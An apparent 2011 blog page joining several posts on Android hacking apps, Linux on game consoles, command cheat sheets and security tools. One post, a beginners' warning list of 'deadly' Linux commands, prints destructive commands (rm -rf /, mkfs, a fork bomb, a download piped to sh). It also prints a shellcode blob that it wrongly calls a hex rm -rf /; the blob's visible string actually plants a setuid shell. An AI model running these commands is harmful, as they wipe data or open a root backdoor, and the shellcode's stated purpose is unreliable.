Thursday, August 18, 2011

Android App for Hacker

Android actually same as other linux Distribution, it just have some speciality (do not say limitability please..) to just run on ARM based device. The backbone is same, Linux Powerfull Kernel. It make me curious, is Android can be able to be an online mobile hacking station?
Then I search on internet, Google mostly, I found a lot of article, there's a lot of people already think about it, and they do not just think, they already make an application too. I'll share with you some apps and thing that I've found on the net for now.

ConnectBot
ConnectBot is an open-source SSH client for your Android mobile. With this nifty little app, you can connect to any SSH server located on this planet (and beyond). Features include simultaneous SSH connections, tunneling, and copy/pasting between different applications. There are plenty of other SSH apps, but according to user ratings, this is by far, the best one out there. It has a 5 star rating from about 21,397 users, so go ahead and start connecting.

App Link: https://market.android.com/details?id=org.connectbot

Hacker's Keyboard
A good hacker loves his or her keyboard more than anything else. It's their only weapon, which brings them a notch closer to their goal of world domination. Whether you've just started or have already conquered half of Antarctica, this little app will allow you to use a full-fledged keyboard on your Android tablet or phone. Apart from being a good replacement to the default Android keyboard, Hacker's Keyboard acts as a perfect companion to the aforementioned ConnectBot app. So, you no longer have to worry about mistyping those life-changing commands you tap in the wee hours of the morning.

App Link: https://market.android.com/details?id=org.pocketworkstation.pckeyboard


Android IRC
You have managed to establish that vital SSH connection that shuts off Skynet. You're just a few taps away from becoming a global superhero. And, in the heat of the moment, you forgot the final command! Bummer! What will you do? Of course, like every seasoned Linux user, you'll seek help on IRC. That's where this great app called Android IRC steps in. In this app, you get all the features of a full-fledged IRC client, thus making sure that help is just a tap away. This is by far the best and the most advanced IRC client for Android and undoubtedly it is not free. Go ahead, give it a try.

App Link: https://market.android.com/details?id=com.countercultured.irc&feature=related_apps


Irssi ConnectBot
This is a modified version of the aforementioned ConnectBot app thus allowing users to use Irssi, the popular IRC client on their phones. Irssi ConnectBot is a free application that has managed to get 4 and ½ ratings so far with more than 10000 downloads.

App Link: https://market.android.com/details?id=org.woltage.irssiconnectbot


Touchqode
If you are a compulsive coder, traveling might be a big hurdle in your marathon programming sessions. If you own an Android device, then thanks to this app, your nerdy mind won't be cranky on the bus anymore. Just install this free application and enjoy most of the features of a desktop IDE. Touchqode currently supports Java, HTML, JavaScript, Python, C++, C#, Ruby and PHP. It also has an FTP and SFTP client built in so that you can upload your code instantly.

App Link: https://market.android.com/details?id=com.touchqode.editor&feature=search_result

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK).
It’s kind of like Firesheep for android, but maybe a bit easier to use (and it works on WPA2!).
Do note that a rooted phone is required. Please note that if the webuser uses SSL this application won’t work This application due to its nature is very phone-dependent so please let the author know if it doesn’t work for you.
There’s a great video demo of it working here:

Android Network Toolkit
I think this one is enormous. At Defcon, developer Zimperium, a security firm, demonstrated an Android application called the Android Network Toolkit (Anti, for short) that would allow users to exploit unprotected devices on security-free WiFi networks (or networks that they have gained access to).
The firm says the tool’s purpose is for people to find aged exploits and patch them so that “hacking” their network and taking control of devices connected to it isn’t as easy as putting together a 10 piece puzzle. It will allow users to do more than just “find” these exploits, though – you can actually act on them as if you had every intent to cause malintent.
Commands like “man-in-the-middle”, a snooping tool, and “attack” allow users to intercept data and control devices with the push of a button.
Security entities claim some people pay up to $10,000 for this sort of functionality whether it be for internal security testing or for malintent, but Zimperium’s application will be made available for free for non-commercial use and only $10 for a corporate license in the Android market sometime within the next week.

undefined

The idea is to use Anti to detect weaknesses in a network or machine so that they can be patched or fixed. But even zImperium knows that Anti can cause serious damage in the wrong hands. The company left a note in the app saying, 
Please remember, with great power comes great responsibility. Use it wisely.




 The Last from this article is the dream of every hacker maybe, a mobile backtrack. This is *not* a native client! This is the chroot + VNC method that we'd been using to get Ubuntu running with Android for a while. The article makes it sound like that's the case, but sadly it's not. However, with the chroot + VNC method we can really run BackTrack 5 on an Android device, and it really does work. This takes some technical skills, and isn't for the non-Linux experienced user.
Yeah it's need a lot of extra skill and time, but if it can run smoothly, why not?



Categories: , , , ,

5 Most Popular Linux Hackable Gadget


Linux is a powerful and versatile operating system that can be utilized to hack just about any electronic hardware device. To prove it, I have here a list of popular gadgets that are already known to run Linux.


1. Nintendo DS

DSLinux, a port of the Linux operating system, made it possible to install Linux on Nintendo DS. DSLinux runs a modified µClinux kernel. It is currently based on uCLinux 2.6.14 (Linux-2.6.14-hsc0). It only runs in textmode and nano-x which is displayed via a custom framebuffer console driver. Input is done via a keyboard displayed on the touchscreen of the Nintendo DS. DSLinux has no package management facilities. Instead, DSLinux builds are distributed as a single tar archive.

With the exception of the microphone, all hardware inside the Nintendo DS, including the wireless is supported by DSLinux. The Nintendo DS firmware can be read from /dev/firmware, but write support is left out for safety reasons.


2. Apple iPod

iPod, everybody’s favorite music player can be installed with Linux. A µClinux-based Linux distribution called iPodLinux is able to run on several iPod models. When the iPodLinux kernel is booted it takes the place of Apple's iPod operating system and automatically loads Podzilla, an alternative GUI and launcher for a number of additional included programs such as a video player, an image viewer, a command line shell, games, emulators for video game consoles, Computer programming demos, and other experimental or occasionally unfinished Computer software.

Here are some of Podzilla’s features:
* An iPod-like user interface
* Video playback with sound
* Support for AAC, MP3 and basic OGG playback (4G & 5G Music Player Daemon is multifunctional, but can be fixed)
* Many games, including TuxChess, Bluecube (Tetris clone), Chopper, StepMania (a Dance Dance Revolution clone) and more
* Recording through audio jack at much higher quality than Apple's firmware
* Ability to play the games Doom and Doom II (and presumably any Doom Total Conversion; Chex Quest for instance)
* Ability to run many emulators, such as iBoy (Nintendo Game Boy Emulator), iNES (Nintendo Entertainment System Emulator), iDarcNES (port of the multiple system emulator DarcNES), iMAME (port of Multiple Arcade Machine Emulator), and iGPSP (Game Boy Advance emulator)


If you are interested in installing Linux on your iPod (5th Generation Video iPod), perhaps this will help: 13 Not-So-Easy Steps to Install Linux on iPod

3. Microsoft Xbox

Xbox Linux is a project that ported the Linux computer operating system to the Microsoft Xbox. There is also a newer project for the Xbox 360, Free60. Because the Xbox uses a digital signature system to prevent the public from running unsigned code, one must either use a modchip, or find an alternative system for running unsigned code. Since the Xbox is essentially just a PC, with a custom processor, a hard drive, RAM, and 4 USB ports, it is capable to run several readily available Linux distributions smoothly. "Xebian", an Xbox compatible version of Debian, and Gentoox, a similarly customized version of Gentoo are known to run successfully on Xbox.

An Xbox with Linux can be a full desktop computer with mouse and keyboard, a web/email box connected to a TV, a server, router or a node in a cluster. One can either dual-boot or use Linux only; in the latter case, one can replace both IDE devices. One can also connect the Xbox to a VGA monitor. A converter may be needed to use keyboards/mice in the controller ports, however this is fairly easy to achieve because the Xbox uses the standard USB bus.


4. Nintendo GameCube

Nintendo GameCube Linux is a project to port Linux to the Nintendo GameCube (and now the Wii) in the same manner as Xbox Linux. The GameCube was seen to be a less attractive system to port Linux to since it not only lacked an on-board Ethernet port and internal hard drive, but also an optical drive natively capable of reading DVDs.

Nintendo GameCube Linux also recognizes SD Cards and Multimedia Cards and is able to use them normally, given the appropriate adaptor.


5. Sony PlayStation

Linux for PlayStation 2, a kit released by Sony Computer Entertainment in 2002, allows the PlayStation 2 console to be used as a personal computer. It included a Linux-based operating system, a USB keyboard and mouse, a VGA adapter, a PS2 network adaptor (Ethernet only), and a 40 GB hard disk drive (HDD). The PS2 Linux distribution is based on Kondara MNU/Linux, a Japanese distribution itself based on Red Hat Linux. PS2 Linux is similar to Red Hat Linux 6, and has most of the features one might expect in a Red Hat Linux 6 system.

The Linux Kit turns the PlayStation 2 into a full-fledged computer system, but it does not allow for use of the DVD-ROM drive except to read PS1 and PS2 discs due to piracy concerns by Sony. Noted open source software that compiles on the kit includes Mozilla Suite, X-Chat, and Gaim. Light-weight applications better suited to the PS2's 32MB of RAM include xv, Dillo, Ted, and AbiWord. The default window manager is Window Maker, but it is possible to install and use Fluxbox and FVWM.

Linux for PlayStation 2 Kit

The PlayStation 3 is also capable of running Linux. Many distributions are compatible with the console. Debian, Fedora 8, Gentoo, OpenSuSE and Ubuntu can be run on the PlayStation 3. Yellow Dog Linux for the PlayStation 3 was first released for the PS3 in late 2006.

Yellow Dog Linux on PS 3


Categories: , , , , , , , ,

10 Essential UNIX/Linux Command Cheat Sheets


Linux has become so idiot proof nowadays that there is less and less need to use the command line. However, the commands and shell scripts have remained powerful for advanced users to utilize to help them do complicated tasks quickly and efficiently.

To those of you who are aspiring to become a UNIX/Linux guru, you have to know loads of commands and learn how to effectively use them. But there is really no need to memorize everything since there are plenty of cheat sheets available on the web and on books. To spare you from the hassles of searching, I have here a collection of 10 essential UNIX/Linux cheat sheets that can greatly help you on your quest for mastery:


UNIX Tutorial for Beginners
This is a quick and easy UNIX/Linux tutorial page that is aimed at beginners. It gives a subtle introduction to some of the most important UNIX/Linux commands.



Learning the Shell
Aside from showing you how to apply the most basic UNIX/Linux commands, “Learning the Shell’ will teach you the utmost importance of using the command line.



Learn UNIX in 10 Minutes
From the page: This is something that I had given out to students (CAD user training) in years past. The purpose was to have on one page the basics commands for getting started using the UNIX shell (so that they didn't call me asking what to do the first time someone gave them a tape).



FOSSwire Unix/Linux Command Cheat Sheet
A one page UNIX/Linux command reference that you can download in PDF format. You can easily print it, and then paste it on your wall.

UNIX Toolbox
From the page: This document is a collection of Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users. This is a practical guide with concise explanations; however the reader is supposed to know what s/he is doing.


Practical Linux Command Line Reference
This is another handy one-page cheat sheet for common command line operations. All of the commands have been tested on Fedora and Ubuntu.


How to Look Like a UNIX Guru
From the page: This lecture takes you through the basic commands and then shows you how to combine them in simple patterns or idioms to provide sophisticated functionality like histogramming. This lecture assumes you know what a shell is and that you have some basic familiarity with UNIX.



A Directory of Linux Commands (in alphabetical order)
From the O'reilly book “Linux in a Nutshell, 5th Edition”, it features an alphabetical list of 687 commands and a short description on each one of them.

Linux Security Quick Reference Guide
This quick reference guide (in PDF) will serve as your aid on improving the security of your Linux system. It provides some pointers to more in-depth security information that could help you become a good UNIX/Linux system administrator.


Bash Programming Cheat Sheet
From the page: A quick cheat sheet for programmers who want to do shell scripting. This is not intended to teach programming, etc. but it is intended for someone who knows one programming language to begin learning about bash scripting.

nb : actually I (cap-cay) just ever used the last, bash scriping guide, the other not yet. :)

Categories: , , , ,

The 7 Deadly Linux Commands


If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.


1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:
wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:
mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

Categories: , , ,

Best Security Software Tools for Linux

source : http://www.junauza.com/2008/07/10-best-hacking-and-security-software.html

Linux is a hacker’s dream computer operating system. It supports tons of tools and utilities for cracking passwords, scanning network vulnerabilities, and detecting possible intrusions. I have here a collection of 10 of the best security software tools for Linux. Please always keep in mind that these tools are not meant to harm, but to protect.


1. John the Ripper

John the Ripper is a free password cracking software tool initially developed for the UNIX operating system. It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.


2. Nmap

Nmap is my favorite network security scanner. It is used to discover computers and services on a computer network, thus creating a "map" of the network. Just like many simple port scanners, Nmap is capable of discovering passive services on a network despite the fact that such services aren't advertising themselves with a service discovery protocol. In addition Nmap may be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, presence of some firewall techniques and, on a local area network, even vendor of the remote network card.

Nmap runs on Linux, Microsoft Windows, Solaris, and BSD (including Mac OS X), and also on AmigaOS. Linux is the most popular nmap platform and Windows the second most popular.


3. Nessus

Nessus is a comprehensive vulnerability scanning software. Its goal is to detect potential vulnerabilities on the tested systems such as:

-Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
-Misconfiguration (e.g. open mail relay, missing patches, etc).
-Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
-Denials of service against the TCP/IP stack by using mangled packets

Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations worldwide. It took first place in the 2000, 2003, and 2006 security tools survey from SecTools.Org.


4. chkrootkit

chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.

It can be used from a "rescue disc" (typically a Live CD) or it can optionally use an alternative directory from which to run all of its own commands. These techniques allow chkrootkit to trust the commands upon which it depend a bit more.

There are inherent limitations to the reliability of any program that attempts to detect compromises (such as rootkits and computer viruses). Newer rootkits may specifically attempt to detect and compromise copies of the chkrootkit programs or take other measures to evade detection by them.


5. Wireshark

Wireshark is a free packet sniffer computer application used for network troubleshooting, analysis, software and communications protocol development, and education. In June 2006, the project was renamed from Ethereal due to trademark issues.

The functionality Wireshark provides is very similar to tcpdump, but it has a GUI front-end, and many more information sorting and filtering options. It allows the user to see all traffic being passed over the network (usually an Ethernet network but support is being added for others) by putting the network interface into promiscuous mode.

Wireshark uses the cross-platform GTK+ widget toolkit, and is cross-platform, running on various computer operating systems including Linux, Mac OS X, and Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.


6. netcat

netcat is a computer networking utility for reading from and writing to network connections on either TCP or UDP.

Netcat was voted the second most useful network security tool in a 2000 poll conducted by insecure.org on the nmap users mailing list. In 2003, it gained fourth place, a position it also held in the 2006 poll.

The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.

Netcat is fully POSIX compatible and there exist several implementations, including a rewrite from scratch known as GNU netcat.


7. Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b and 802.11g traffic.

Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.


8. hping

hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Like most tools used in computer security, hping is useful to both system administrators and crackers (or script kiddies).


9. Snort

Snort is a free and open source Network Intrusion prevention system (NIPS) and network intrusion detection (NIDS) capable of performing packet logging and real-time traffic analysis on IP networks.

Snort performs protocol analysis, content searching/matching, and is commonly used to actively block or passively detect a variety of attacks and probes, such as buffer overflows, stealth port scans, web application attacks, SMB probes, and OS fingerprinting attempts, amongst other features. The software is mostly used for intrusion prevention purposes, by dropping attacks as they are taking place. Snort can be combined with other software such as SnortSnarf, sguil, OSSIM, and the Basic Analysis and Security Engine (BASE) to provide a visual representation of intrusion data. With patches for the Snort source from Bleeding Edge Threats, support for packet stream antivirus scanning with ClamAV and network abnormality with SPADE in network layers 3 and 4 is possible with historical observation.


10. tcpdump

tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

In some Unix-like operating systems, a user must have superuser privileges to use tcpdump because the packet capturing mechanisms on those systems require elevated privileges. However, the -Z option may be used to drop privileges to a specific unprivileged user after capturing has been set up. In other Unix-like operating systems, the packet capturing mechanism can be configured to allow non-privileged users to use it; if that is done, superuser privileges are not required.

The user may optionally apply a BPF-based filter to limit the number of packets seen by tcpdump; this renders the output more usable on networks with a high volume of traffic.


11. Ettercap

Ettercap is a console-based network sniffer/interceptor/logger that is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap also has the ability to actively or passively find other poisoners on the LAN.



12. Nikto

Nikto is a web server scanner that is known to perform comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. It performs generic and server type specific checks. It also captures and prints any cookies received.



13. OpenSSH

OpenSSH is a Free and Open Source version of the SSH connectivity tools providing encrypted communication sessions over a computer network. It encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.



14. Aircrack-ng

Aircrack-ng is a wireless tool and password cracker. It is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.



15. Tripwire

Tripwire is a security and data integrity tool that is useful for monitoring and alerting on specific file change(s) on a range of systems. Used with system files on a regular basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.



16. Metasploit Framework

Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit-building demo.



17. THC Hydra

THC (The Hacker's Choice) Hydra uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different services. It was designed as a proof-of-concept utility to demonstrate the ease of cracking poorly chosen passwords. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.



18. Dsniff

Dsniff is suite of powerful network auditing and penetration-testing tools and utilities that includes code to parse many different application protocols and extract interesting information. The information that can be obtained from this sniff application are: usernames and passwords, web pages being visited, contents of email, etc.



19. RainbowCrack

RainbowCrack is a password hash cracker that makes use of a large-scale time-memory trade-off. It differs from "conventional" brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically.



20. rkhunter

rkhunter scans for rootkits, backdoors and possible local exploits. It does this by comparing SHA-1 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

Categories: , , , ,

Copyright © Johannes Dwi Cahyo | Powered by Blogger

Design by Anders Noren | Blogger Theme by NewBloggerThemes.com | BTheme.net      Up ↑